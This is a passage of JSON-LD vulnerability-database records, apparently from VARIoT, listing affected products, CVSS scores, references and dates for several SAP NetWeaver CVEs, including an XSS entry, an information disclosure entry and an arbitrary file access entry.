"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-11T00:00:00",
"db": "BID",
"id": "105308"
},
{
"date": "2018-12-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010219"
},
{
"date": "2018-09-11T15:29:02.017000",
"db": "NVD",
"id": "CVE-2018-2464"
},
{
"date": "2018-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-493"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-11T00:00:00",
"db": "BID",
"id": "105308"
},
{
"date": "2018-12-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010219"
},
{
"date": "2018-11-09T17:16:20.167000",
"db": "NVD",
"id": "CVE-2018-2464"
},
{
"date": "2018-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-493"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-493"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP WebDynpro Java Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010219"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-493"
}
],
"trust": 0.6
}
}
var-201402-0236
Vulnerability from variot
The Solution Manager in SAP NetWeaver does not properly restrict access, which allows remote attackers to obtain sensitive information via unspecified vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201402-0236",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver solution manager",
"scope": "eq",
"trust": 3.0,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver solution manager",
"scope": "eq",
"trust": 3.0,
"vendor": "sap",
"version": "7.1"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 1.4,
"vendor": "sap",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver solution manager",
"version": "7.0"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver solution manager",
"version": "7.1"
}
],
"sources": [
{
"db": "IVD",
"id": "3e1d81b4-1eea-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-01097"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001410"
},
{
"db": "NVD",
"id": "CVE-2014-1960"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-203"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_solution_manager:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_solution_manager:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1960"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Evgeny Neyolov, ERPScan.",
"sources": [
{
"db": "BID",
"id": "65543"
}
],
"trust": 0.3
},
"cve": "CVE-2014-1960",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2014-1960",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-01097",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "3e1d81b4-1eea-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-1960",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2014-01097",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201402-203",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "3e1d81b4-1eea-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "3e1d81b4-1eea-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-01097"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001410"
},
{
"db": "NVD",
"id": "CVE-2014-1960"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-203"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Solution Manager in SAP NetWeaver does not properly restrict access, which allows remote attackers to obtain sensitive information via unspecified vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1960"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001410"
},
{
"db": "CNVD",
"id": "CNVD-2014-01097"
},
{
"db": "BID",
"id": "65543"
},
{
"db": "IVD",
"id": "3e1d81b4-1eea-11e6-abef-000c29c66e3d"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-1960",
"trust": 3.5
},
{
"db": "SECUNIA",
"id": "56942",
"trust": 2.2
},
{
"db": "BID",
"id": "65543",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2014-01097",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201402-203",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001410",
"trust": 0.8
},
{
"db": "IVD",
"id": "3E1D81B4-1EEA-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "3e1d81b4-1eea-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-01097"
},
{
"db": "BID",
"id": "65543"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001410"
},
{
"db": "NVD",
"id": "CVE-2014-1960"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-203"
}
]
},
"id": "VAR-201402-0236",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "3e1d81b4-1eea-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-01097"
}
],
"trust": 1.07111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "3e1d81b4-1eea-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-01097"
}
]
},
"last_update_date": "2023-12-18T12:21:29.589000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "SAP NetWeaver Solution Manager has patches for unclear security bypass vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/43737"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01097"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001410"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001410"
},
{
"db": "NVD",
"id": "CVE-2014-1960"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://secunia.com/advisories/56942"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1828885"
},
{
"trust": 1.4,
"url": "http://erpscan.com/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91093"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-1960"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-1960"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/65543"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01097"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001410"
},
{
"db": "NVD",
"id": "CVE-2014-1960"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-203"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "3e1d81b4-1eea-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-01097"
},
{
"db": "BID",
"id": "65543"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001410"
},
{
"db": "NVD",
"id": "CVE-2014-1960"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-203"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-20T00:00:00",
"db": "IVD",
"id": "3e1d81b4-1eea-11e6-abef-000c29c66e3d"
},
{
"date": "2014-02-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01097"
},
{
"date": "2014-01-25T00:00:00",
"db": "BID",
"id": "65543"
},
{
"date": "2014-02-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001410"
},
{
"date": "2014-02-14T15:55:07.437000",
"db": "NVD",
"id": "CVE-2014-1960"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201402-203"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01097"
},
{
"date": "2014-02-18T12:27:00",
"db": "BID",
"id": "65543"
},
{
"date": "2014-02-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001410"
},
{
"date": "2018-12-10T19:29:03.297000",
"db": "NVD",
"id": "CVE-2014-1960"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201402-203"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201402-203"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of Solution Manager Vulnerability in which important information is obtained",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001410"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201402-203"
}
],
"trust": 0.6
}
}
var-201404-0302
Vulnerability from variot
An unspecified J2EE core service in the J2EE Engine in SAP NetWeaver does not properly restrict access, which allows remote attackers to read and write to arbitrary files via unknown vectors. This may lead to further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201404-0302",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006310"
},
{
"db": "NVD",
"id": "CVE-2013-7364"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-132"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7364"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Juan Perez-Etchegoyen",
"sources": [
{
"db": "BID",
"id": "58175"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-099"
}
],
"trust": 0.9
},
"cve": "CVE-2013-7364",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-7364",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-7364",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201404-132",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2013-7364",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-7364"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006310"
},
{
"db": "NVD",
"id": "CVE-2013-7364"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-132"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An unspecified J2EE core service in the J2EE Engine in SAP NetWeaver does not properly restrict access, which allows remote attackers to read and write to arbitrary files via unknown vectors. This may lead to further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7364"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006310"
},
{
"db": "BID",
"id": "58175"
},
{
"db": "VULMON",
"id": "CVE-2013-7364"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7364",
"trust": 2.8
},
{
"db": "BID",
"id": "58175",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006310",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201303-099",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20130222 [ONAPSIS SECURITY ADVISORY 2013-004] SAP J2EE CORE SERVICE ARBITRARY FILE ACCESS",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201404-132",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2013-7364",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-7364"
},
{
"db": "BID",
"id": "58175"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006310"
},
{
"db": "NVD",
"id": "CVE-2013-7364"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-099"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-132"
}
]
},
"id": "VAR-201404-0302",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:57:44.279000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note, 1682613",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006310"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006310"
},
{
"db": "NVD",
"id": "CVE-2013-7364"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-02/0133.html"
},
{
"trust": 2.5,
"url": "http://www.onapsis.com/get.php?resid=adv_onapsis-2013-004"
},
{
"trust": 2.5,
"url": "http://www.onapsis.com/research-advisories.php"
},
{
"trust": 1.7,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.7,
"url": "https://service.sap.com/sap/support/notes/1682613"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7364"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7364"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/58175"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/264.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-7364"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006310"
},
{
"db": "NVD",
"id": "CVE-2013-7364"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-099"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-132"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2013-7364"
},
{
"db": "BID",
"id": "58175"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006310"
},
{
"db": "NVD",
"id": "CVE-2013-7364"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-099"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-132"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-04-10T00:00:00",
"db": "VULMON",
"id": "CVE-2013-7364"
},
{
"date": "2013-02-21T00:00:00",
"db": "BID",
"id": "58175"
},
{
"date": "2014-04-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006310"
},
{
"date": "2014-04-10T20:55:06.167000",
"db": "NVD",
"id": "CVE-2013-7364"
},
{
"date": "2013-02-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201303-099"
},
{
"date": "2014-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-132"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-04-11T00:00:00",
"db": "VULMON",
"id": "CVE-2013-7364"
},
{
"date": "2014-06-30T00:15:00",
